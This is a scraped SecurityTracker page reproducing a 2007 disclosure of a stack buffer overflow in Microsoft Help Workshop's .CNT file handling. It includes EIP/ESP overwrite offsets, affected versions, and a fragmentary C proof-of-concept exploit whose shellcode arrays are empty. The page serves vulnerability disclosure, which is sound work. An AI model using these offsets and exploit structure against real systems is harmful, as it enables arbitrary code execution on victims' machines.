Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Become a Partner and License Our Database or Notification Service
Microsoft Help Workshop Buffer Overflow in Processing '.CNT' Files Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1017530|
SecurityTracker URL: http://securitytracker.com/id/1017530
(Links to External Site)
Updated: May 19 2008|
Original Entry Date: Jan 18 2007
Execution of arbitrary code via network, User access via network|
Exploit Included: Yes |
A vulnerability was reported in Microsoft Help Workshop. A remote user can cause arbitrary code to be executed on the target user's system.|
A remote user can create a specially crafted '.CNT' help contents file that, when loaded by the target user, will trigger a stack overflow and execute arbitrary code on the target system. The code will run with the privileges of the target user.
Microsoft Visual Studio 6.0 SP6 and Microsoft Visual Studio 2003 (.Net) include the vulnerable component.
porkythepig discovered this vulnerability.
A demonstration exploit is available at:
A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system.|
No solution was available at the time of this entry.|
Vendor URL: www.microsoft.com/ (Links to External Site)
|Underlying OS: Windows (Any)|
Source Message Contents
Subject: Microsoft Help Workshop .CNT contents files buffer overflow|
There is a stack based memory corruption in Microsoft Help Workshop
while processing .CNT Help Contents files,
The tool is standard component of Microsoft Visual Studio 6.0 and 2003 (.NET)
for building and managing help projects
and could be also downloaded alone from the Microsoft download center.
Remote code execution
An attacker must construct malformed .cnt file and induce victim to
open it with the tool, or if Help Workshop has been launched
in the past (after first launch it associates the .cnt files with itself),
to launch the malicious file by doubleclicking/selecting for editing.
The stack based buffer overflow occurs in Microsoft Help Workshop
while processing .cnt files.Each potentialy vulnerable line is
constructed with the "%d %s" format ,
and placed by the program before processing in the static
buffer, which overflows itself because of lack of input data boundary
When the overflow occurs, the EIP register value is set to the DWORD value
placed 526 bytes counting from the beginning of 'SomeContentsDescription' string.
The ESP is set to DWORD value placed 534 bytes counting from the beggining of
The process control can be therefore intercepted by the attacker by
redirecting the instruction flow to the attackers provided code within the .cnt file.
Microsoft Help Workshop v4.03.0002
Microsoft Visual Studio 6.0 SP6
Microsoft Visual Studio 2003 (.Net)
Proof of Concept exploit has been included at the end of the advisory.
After compiled, it will produce .cnt exploit files that
after succesfull exploitation should spawn user specified process
(by default notepad.exe), in the user specified OS enviroment.
The exploit can be also found at:
Vulnerability discovered and researched by: porkythepig
Exploit by: porkythepig
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
// vulnerability found / exploit built by porkythepig
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
unsigned int extPro;
unsigned int getStarInf;
unsigned int crePro;
unsigned int getWinDir;
unsigned int jmpEspPtr;
unsigned char shlCode=
unsigned char backSeq=
printf("Exploit buffer compiled\n");
printf("Cannot open file for writing\n");
printf("Output .cnt file [ %s ] built successfully\n",outName);
void ProcessInput(int argc, char* argv)
printf("\nMicrosoft Help Workshop 4.03.0002 .cnt files exploit\n");
printf("Vulnerability found & exploit built by porkythepig\n");
printf("Syntax: exploit.exe os outName [spawnProc]\n");
printf("[ os ] host OS, possible choices:\n");
printf(" 0 Windows 2000 SP4 [Polish] updates on 11.01.2007\n");
printf(" 1 Windows 2000 SP4 [English]\n");
printf(" 2 Windows 2000 SP4 [English] updates on 11.01.2007\n");
printf(" 3 Windows XP Pro SP2 [English] updates on 11.01.2007\n");
printf(" 4 Windows XP Pro [English]\n");
printf("[ outName ] output .cnt exploit file name\n");
printf("[ spawnProc ] *optional* full path to the process to be spawned by\n");
printf(" the exploit (if none specified default will be notepad.exe)\n");
int main(int argc, char* argv)
Go to the Top of This SecurityTracker Archive Page